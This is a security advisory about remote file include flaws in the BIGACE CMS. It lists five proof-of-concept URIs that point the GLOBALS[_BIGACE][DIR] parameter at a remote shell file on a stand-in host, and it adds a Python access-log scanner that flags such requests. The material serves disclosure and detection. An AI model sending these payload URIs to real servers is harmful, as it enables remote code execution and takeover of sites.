BIGACE 'GLOBALS[_BIGACE][DIR]' Parameter Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following proof-of-concept URIs are available:
http://www.example.com/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=http://www.example2.com/shell.txt?
http://www.example.com/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=http://www.example2.com/shell.txt?
http://www.example.com/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=http://www.example2.com/shell.txt?
http://www.example.com/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=http://www.example2.com/shell.txt?
http://www.example.com/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=http://www.example2.com/shell.txt?
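
Detection logic for the request pattern in the URIs above, added here as an example and not part of the original advisory: it flags access-log entries whose query string supplies a `GLOBALS[...]` parameter, including percent-encoded forms, and rates them high when the value is a remote URL. The log lines are constructed samples in combined log format, and the function names are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Parameter names that address PHP's $GLOBALS array from the request.
GLOBALS_KEY_RE = re.compile(r'^GLOBALS(?:\[|$)')
# Values that point an include at a remote resource.
REMOTE_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample entries (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /bigace/index.php?id=5 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2010:10:00:05 +0000] "GET /bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=http://www.example2.com/shell.txt? HTTP/1.1" 200 312',
    '192.0.2.44 - - [01/Jan/2010:10:00:09 +0000] "GET /bigace/addon/smarty/plugins/function.captcha.php?GLOBALS%5B_BIGACE%5D%5BDIR%5D%5Baddon%5D=http%3A%2F%2Fwww.example2.com%2Fshell.txt%3F HTTP/1.1" 200 298',
]

def fully_unquote(s, rounds=3):
    """Undo up to `rounds` layers of percent-encoding (catches double encoding)."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def inspect_line(line):
    """Return (path, param, value, severity) findings for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group(1))
    findings = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        key, value = fully_unquote(key), fully_unquote(value)
        if GLOBALS_KEY_RE.match(key):
            sev = "high" if REMOTE_VALUE_RE.match(value) else "medium"
            findings.append((parts.path, key, value, sev))
    return findings

def scan(lines):
    """Collect findings across all log lines, in order."""
    return [f for line in lines for f in inspect_line(line)]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```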


 

Copyright 2010, SecurityFocus